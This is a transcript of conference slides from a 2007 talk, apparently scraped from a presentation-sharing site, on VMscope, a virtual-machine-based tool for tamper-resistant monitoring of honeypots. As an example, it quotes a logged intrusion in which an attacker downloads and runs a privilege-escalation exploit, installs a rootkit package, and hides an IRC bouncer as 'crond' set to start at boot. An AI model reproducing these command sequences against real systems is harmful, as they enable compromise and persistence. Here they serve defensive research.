Presentation is loading. Please wait.

Presentation is loading. Please wait.

“Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George.

Published byEvelyn Thore Modified over 9 years ago

Similar presentations

Presentation on theme: "“Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George."— Presentation transcript:

1 “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George Mason University {xjiang, xwangc}@gmu.edu RAID’07, Queensland, Australia, Sep 4, 2007

2 Outline  Motivation  VMscope  Enabling “Out-of-the-Box” Honeypot Monitoring  Evaluation  Related Work  Conclusion

3 Motivation  Promise of honeypots  Providing insights into intruders’ motivations, tactics, and tools  Highly concentrated datasets w/ low noise  Low false-positive and false negative rate  Discovering unknown vulnerabilities/exploitations  Example 1: HoneyMonkey finds first zero-day exploit [Wang+ NDSS’06]  Example 2: CERT advisory CA-2002-01 (solaris CDE subprocess control daemon – dtspcd)

4 Motivation  Honeypot monitoring  The essential component in any honeypot deployment  Two main approaches (state of the art)  External honeypot monitoring  e.g., tcpdump, ethereal, etc  Internal honeypot monitoring  e.g., syslog, sebek, etc Internal External Tamper- resistance Deep Inspection Low High Yes No

5 Motivation: A Real-World Example  Sebek – the de-facto high-interaction honeypot monitoring tool, which performs three basic tasks  Observe system call activities  Record Data  Export Data  However, it has been demonstrated that it can be detected, disabled, or completely evaded by NoSEBrEaK [Holz+, IAW’04/ BlackHat’04/Defcon 12]

6 Focus of This Talk  “Out-of-the-Box” honeypot monitoring  VMscope Internal External Deep Inspection Low High Yes No Tamper- resistance

7  Key idea: leveraging and extending virtualization to enable tamper-resistant, deep inspection of VM-based high- interaction honeypots  Existing tools only achieve one of them, but not both Apache FirefoxIE Logger Guest OS Virtual Machine Monitor (VMM) Virtual Machine … Log VMscope Tamper-resistant Logging: VMscope is deployed completely “out-of-the-box” Tamper-resistant Logging: VMscope is deployed completely “out-of-the-box” Deep Inspection: VMscope intercepts and interprets all system call events

8 Apache FirefoxIE Guest OS Virtual Machine … Design (Sebek vs. VMscope)  Tamper-resistant logging:  In VMscope, log is not collected from inside the VM that is being monitored Logger Apache FirefoxIE OS Kernel Machine … Sebek Logger Virtual Machine Monitor (VMM) VMscope Logger

9 Design  Deep Inspection  What we can observe?  Low-level events  Privileged instructions, Interrupts, I/O accesses …  What we want to observe?  High-level events w/ semantic info  Especially system calls. Virtual Machine Monitor (VMM) Guest OS Semantic Gap

10 Bridging the Semantic Gap  Idea: leveraging the semantics associated with system call instructions  e.g., invoking “exit” system call: xorl %ebx, %ebx /* ebx = 0 */ mov $0x1, %eax /* eax = 1 */ int $0x80 /* interrupt*/  Also works when interpreting the system call return values  Other related issues  The current process  e.g., PID, UID, process name, etc  Guest memory addressing

11 Identifying the Current Process  The Linux kernel maintains a process-specific kernel stack (ESP)  ESP  struct task_struct in Linux 2.4  ESP  struct thread_info in Linux 2.6  The Windows kernel similarly maintains a data structure, i.e., KTHREAD, for each kernel thread  struct KTHREAD  struct EPROCESS  Works for Windows 2000/XP/2003, but with varing definitions, though

12 Guest Memory Addressing  Inside the VM, the hardware automates the translation process  Guest virtual -> guest physical  Outside the VM, we need to emulate the translation process  CR3  page directory  page table  guest physical

13 Outline  Motivation  VMscope  “Out-of-the-Box” Honeypot Monitoring  Evaluation  Related Work  Conclusion

14 Implementation  A prototype has been implemented on top of QEMU and VMware  2800+ LOCs (in C)  Supporting both Linux VMs and Windows VMs (in progress)  Demo (3.5mins)  http://www.ise.gmu.edu/~xjiang/vmscope/vmscope.swf http://www.ise.gmu.edu/~xjiang/vmscope/vmscope.swf

15 Evaluation  Deep Inspection  Apache normal runs  Apache under infections (by Slapper worms)  Honeypot incidents  Tamper-resistance  A comparative study between Sebek and VMscope  NoSEBrEaK + adore_ng (a kernel rootkit)

16 Deep Inspection – Apache  In response to a simple web request

17 Deep Inspection – A Honeypot Incident  Two vulnerabilities  Vul 1: Apache (CERT® CA-2002-17)  Vul 2: Ptrace (CERT® VU-6288429)  Deployed at 23:00pm, 01/26/2007, compromised 3 hours later PID 1562 ( sh)[sys_execve 11]: bash -i... PID 1572 ( bash)[sys_execve 11]: uname -a PID 1573 ( bash)[sys_execve 11]: id PID 1574 ( bash)[sys_execve 11]: w... PID 1632 ( bash)[sys_execve 11]: ls PID 1633 ( bash)[sys_execve 11]: wget xxxxxxx.xx.ro/soft/expl PID 1634 ( bash)[sys_execve 11]: chmod +x expl PID 1635 ( bash)[sys_execve 11]:./expl... 1. Gaining a regular account: apache 2. Escalating to the root privilege

18 Deep Inspection – A Honeypot Incident PID 1674 ( bash)[sys_execve 11]: wget xxxxxxx.xx.ro/soft/naky.tgz PID 1676 ( bash)[sys_execve 11]: tar -zxvf naky.tgz PID 1679 ( bash)[sys_execve 11]: chmod +x * PID 1680 ( bash)[sys_execve 11]:./install... PID 1882 ( bash)[sys_execve 11]: mkdir ". " PID 1883 ( bash)[sys_execve 11]: wget www.xxxxxxxx.org/vulturul/bnc.tgz PID 1886 ( bash)[sys_execve 11]: tar xvfz bnc.tgz PID 1888 ( bash)[sys_execve 11]: rm -rf bnc.tgz PID 1889 ( bash)[sys_execve 11]: mv psybnc crond PID 1892 ( bash)[sys_execve 11]: crond PID 1894 ( bash)[sys_execve 11]: pico /etc/rc.d/rc.local 3. Installing a set of backdoors 4. Installing an IRC bot that will auto-start after machine reboot

19 Tamper-resistance  Demo Clip (2.5 minutes):  http://www.ise.gmu.edu/~xjiang/vmscope/sebek.swf

20 Performance Evaluation  Evaluation Environment  Dell PowerEdge server 2950 running Fedora Core 5 w/ a 3.73 GHz Xeon and 4GB RAM  Benchmark Applications

21 Related Work  Honeypot monitoring  External honeypot monitoring (e.g., tcpdump)  Ineffective when traffic is encrypted  Internal honeypot monitoring (e.g., Sebek)  Could be potentially detected, disabled and evaded  Other virtualization-based efforts  Xebek / VMM-based sensors  Not completely “out-of-the-box” Based on para-virtualization, which requires modifying the guest OS kernels Some logging components are still running inside the guest OS

22 Internal External Deep Inspection Low High Yes No Tamper- resistance Conclusions  A new approach to monitoring VM-based high- interaction honeypots – VMscope

23 Thank you!

Download ppt "“Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George."

Similar presentations

Secure In-VM Monitoring Using Hardware Virtualization Monirul Sharif, Wenke Lee, Weidong Cui, and Andrea Lanzi Presented by Tyler Bletsch.

Secure In-VM Monitoring Using Hardware Virtualization Monirul Sharif, Wenke Lee, Weidong Cui, and Andrea Lanzi Presented by Tyler Bletsch.
Using VMX within Linux We explore the feasibility of executing ROM-BIOS code within the Linux x86_64 kernel.

Using VMX within Linux We explore the feasibility of executing ROM-BIOS code within the Linux x86_64 kernel.
Anh M. Nguyen, Nabil Schear, HeeDong Jung, Apeksha Godiyal, Samuel T.King University of Illionis at Urbana-Champaign Hai D. Nguyen Hanoi University of.

Anh M. Nguyen, Nabil Schear, HeeDong Jung, Apeksha Godiyal, Samuel T.King University of Illionis at Urbana-Champaign Hai D. Nguyen Hanoi University of.
Web Canary -- client honey pot UTSA. Architecture of Web canary. 2.

Web Canary -- client honey pot UTSA. Architecture of Web canary. 2.
Efficient VM Introspection in KVM and Performance Comparison with Xen

Efficient VM Introspection in KVM and Performance Comparison with Xen
Virtual Machine Security Design of Secure Operating Systems Summer 2012 Presented By: Musaad Alzahrani.

Virtual Machine Security Design of Secure Operating Systems Summer 2012 Presented By: Musaad Alzahrani.
Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science.

Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science.
Virtual Machines Measure Up John Staton Karsten Steinhaeuser University of Notre Dame December 15, 2005 Graduate Operating Systems, Fall 2005 Final Project.

Virtual Machines Measure Up John Staton Karsten Steinhaeuser University of Notre Dame December 15, 2005 Graduate Operating Systems, Fall 2005 Final Project.
Presented by Boris Yurovitsky

Presented by Boris Yurovitsky
Disco Running Commodity Operating Systems on Scalable Multiprocessors.

Disco Running Commodity Operating Systems on Scalable Multiprocessors.
Process Coloring: An Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu, Ryan Riley Department of Computer Science.

Process Coloring: An Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu, Ryan Riley Department of Computer Science.
Backtracking Intrusions Sam King Peter Chen CoVirt Project, University of Michigan.

Backtracking Intrusions Sam King Peter Chen CoVirt Project, University of Michigan.
Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and.

Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and.
Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science.

Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science.
An Out-of-the-Box Approach to High Assurance Computer System Monitoring and Integrity Protection Cyber Defense Conference, Rome, NY, May 12-14, 2008 Assistant.

An Out-of-the-Box Approach to High Assurance Computer System Monitoring and Integrity Protection Cyber Defense Conference, Rome, NY, May 12-14, 2008 Assistant.
A. Frank - P. Weisberg Operating Systems Structure of Operating Systems.

A. Frank - P. Weisberg Operating Systems Structure of Operating Systems.
SubVirt: Implementing malware with virtual machines Yi-Min Wang Chad Verbowski Helen J. Wang Jacob R. Lorch Microsoft Research Samuel T. King Peter M.

SubVirt: Implementing malware with virtual machines Yi-Min Wang Chad Verbowski Helen J. Wang Jacob R. Lorch Microsoft Research Samuel T. King Peter M.
Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu Department of Computer Science and Center.

Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu Department of Computer Science and Center.
Jiang Wang, Joint work with Angelos Stavrou and Anup Ghosh CSIS, George Mason University HyperCheck: a Hardware Assisted Integrity Monitor.

Jiang Wang, Joint work with Angelos Stavrou and Anup Ghosh CSIS, George Mason University HyperCheck: a Hardware Assisted Integrity Monitor.
Virtualization for Cloud Computing

Virtualization for Cloud Computing

Similar presentations

Ads by Google